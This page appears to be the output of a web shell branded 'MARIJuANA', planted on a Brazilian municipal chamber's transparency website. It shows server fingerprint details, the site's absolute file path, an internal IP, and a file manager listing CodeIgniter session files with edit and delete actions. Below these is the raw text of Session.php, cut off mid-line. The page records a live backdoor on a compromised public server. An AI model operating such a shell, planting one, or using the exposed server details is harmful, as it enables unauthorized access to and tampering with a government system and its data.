MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/camara-morro-chapeu/public_html/transparencia/system/libraries/Session/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
drivers dir drwxrwxr-x 2023-05-02 09:56 R D
CI_Session_driver_interface.php 2.196 KB -rw-rw-r-- 2023-05-02 09:56 R E G D
OldSessionWrapper.php 2.696 KB -rw-rw-r-- 2023-05-02 09:56 R E G D
PHP8SessionWrapper.php 2.871 KB -rw-rw-r-- 2023-05-02 09:56 R E G D
Session.php 24.617 KB -rw-rw-r-- 2023-05-02 09:56 R E G D
SessionHandlerInterface.php 2.263 KB -rw-rw-r-- 2023-05-02 09:56 R E G D
SessionUpdateTimestampHandlerInterface.php 2.159 KB -rw-rw-r-- 2023-05-02 09:56 R E G D
Session_driver.php 5.219 KB -rw-rw-r-- 2023-05-02 09:56 R E G D
index.html 0.128 KB -rw-rw-r-- 2023-05-02 09:56 R E G D
REQUEST EXIT
_driver = $params['driver']; unset($params['driver']); } elseif ($driver = config_item('sess_driver')) { $this->_driver = $driver; } // Note: BC workaround elseif (config_item('sess_use_database')) { log_message('debug', 'Session: "sess_driver" is empty; using BC fallback to "sess_use_database".'); $this->_driver = 'database'; } $class = $this->_ci_load_classes($this->_driver); // Configuration ... $this->_configure($params); $this->_config['_sid_regexp'] = $this->_sid_regexp; $class = new $class($this->_config); $wrapper = new CI_SessionWrapper($class); if (is_php('5.4')) { session_set_save_handler($wrapper, TRUE); } else { session_set_save_handler( array($wrapper, 'open'), array($wrapper, 'close'), array($wrapper, 'read'), array($wrapper, 'write'), array($wrapper, 'destroy'), array($wrapper, 'gc') ); register_shutdown_function('session_write_close'); } // Sanitize the cookie, because apparently PHP doesn't do that for userspace handlers if (isset($_COOKIE[$this->_config['cookie_name']]) && ( ! is_string($_COOKIE[$this->_config['cookie_name']]) OR ! preg_match('#\A'.$this->_sid_regexp.'\z#', $_COOKIE[$this->_config['cookie_name']]) ) ) { unset($_COOKIE[$this->_config['cookie_name']]); } session_start(); // Is session ID auto-regeneration configured? (ignoring ajax requests) if ((empty($_SERVER['HTTP_X_REQUESTED_WITH']) OR strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) !== 'xmlhttprequest') && ($regenerate_time = config_item('sess_time_to_update')) > 0 ) { if ( ! isset($_SESSION['__ci_last_regenerate'])) { $_SESSION['__ci_last_regenerate'] = time(); } elseif ($_SESSION['__ci_last_regenerate'] < (time() - $regenerate_time)) { $this->sess_regenerate((bool) config_item('sess_regenerate_destroy')); } } // Another work-around ... PHP doesn't seem to send the session cookie // unless it is being currently created or regenerated elseif (isset($_COOKIE[$this->_config['cookie_name']]) && $_COOKIE[$this->_config['cookie_name']] === session_id()) { $expires = empty($this->_config['cookie_lifetime']) ? 0 : time() + $this->_config['cookie_lifetime']; if (is_php('7.3')) { setcookie( $this->_config['cookie_name'], session_id(), array( 'expires' => $expires, 'path' => $this->_config['cookie_path'], 'domain' => $this->_config['cookie_domain'], 'secure' => $this